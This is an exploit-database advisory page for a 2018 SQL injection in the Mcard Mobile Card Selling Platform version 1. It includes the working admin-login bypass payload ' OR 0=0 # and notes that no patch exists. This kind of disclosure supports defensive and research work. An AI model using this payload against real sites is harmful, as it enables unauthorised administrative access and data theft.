header-logo
Suggest Exploit
vendor:
Mcard Mobile Card Selling Platform
by:
L0RD
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Mcard Mobile Card Selling Platform
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:codecanyon:mcard_mobile_card_selling_platform
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux
2018

Mcard Mobile Card Selling Platform 1 – SQL Injection

Attacker can bypass admin panel authentication by entering Username as ' OR 0=0 # and any Password.

Mitigation:

Input validation and sanitization should be done to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title:  # Exploit Title: Mcard Mobile Card Selling Platform 1 - SQL Injection
# Date: 2018-05-23
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15
# Version: 1
# Tested on: Kali linux

# POC 1 :

# Attacker can bypass admin panel authentication
Username : ' OR 0=0 #
Password : anything

Navigation

Suggest Exploit

Services By CQR